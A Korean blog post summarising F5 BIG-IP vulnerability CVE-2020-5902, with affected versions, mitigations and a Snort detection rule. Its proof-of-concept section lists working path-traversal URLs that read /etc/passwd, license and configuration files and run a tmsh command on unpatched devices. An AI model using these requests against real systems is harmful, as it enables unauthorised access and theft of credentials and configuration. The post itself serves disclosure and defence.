티스토리 뷰

728x90
반응형

[CVE 취약점] F5사 BIG-IP 제품군의 원격코드실행 취약점(CVE-2020-5902)


참조

https://github.com/yassineaboukir/CVE-2020-5902

https://www.youtube.com/watch?v=z8zyrVlKK-Q

https://support.f5.com/csp/article/K52145254

https://www.boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=35498


Poc 

Proof of concept

https:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd


https:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts

https:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license

https:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf

https:///tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

개요

F5는 BIG-IP에서 발생하는 취약점을 해결한 보안 업데이트 발표

공격자는 해당 취약점을 악용하여 원격코드실행 등의 피해를 발생시킬 수 있으므로, 최신 버전으로 업데이트 권고

  ※ F5 : 응용 서비스 및 네트워크 관리 제품 개발을 전문으로 하는 다국적 기업

     BIG-IP : 네트워크 및 보안 관리 기능을 제공하는 어플라이언스 제품


BIG-IP의 Traffic Management User Interface(TMUI)에서 접근통제가 미흡하여 발생하는 원격코드실행 취약점(CVE-2020-5902)


영향 받는 제품 버전

 BIG-IP(LTM, AAM, AFM, Analytics, APM, ASM, DNS, FPS, GTM, Link Controller, PEM) 

버전 종류 영향 받는 버전 최신 버전(해결 버전) 

15.x          15.1.0                  15.1.0.4 

14.x          14.1.0 - 14.1.2        14.1.2.6 

13.x          13.1.0 - 13.1.3        13.1.3.4 

12.x          12.1.0 - 12.1.5        12.1.5.2 

11.x          11.6.1 - 11.6.5        11.6.5.2 


방안

최신버전으로 업데이트 수행

보안 설정 적용

- httpd에 대한 LocationMatch 설정

- Self IPs 설정

- 관리 인터페이스 보안 설정

 ※ 참고 사이트의 ‘Mitigation’ 항목 확인하여 조치


Snort  

alert tcp any any -> any any (sid:1; gid:1; flow:established,to_server; uricontent:"/tmui/login.jsp/..|3b|/tmui/"; nocase; msg:"BIG IP_RCE_CVE-2020-5902";)




728x90
반응형
댓글
댓글쓰기 폼
반응형
250x250
공지사항
«   2020/12   »
    1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31    
Total
167,463
Today
4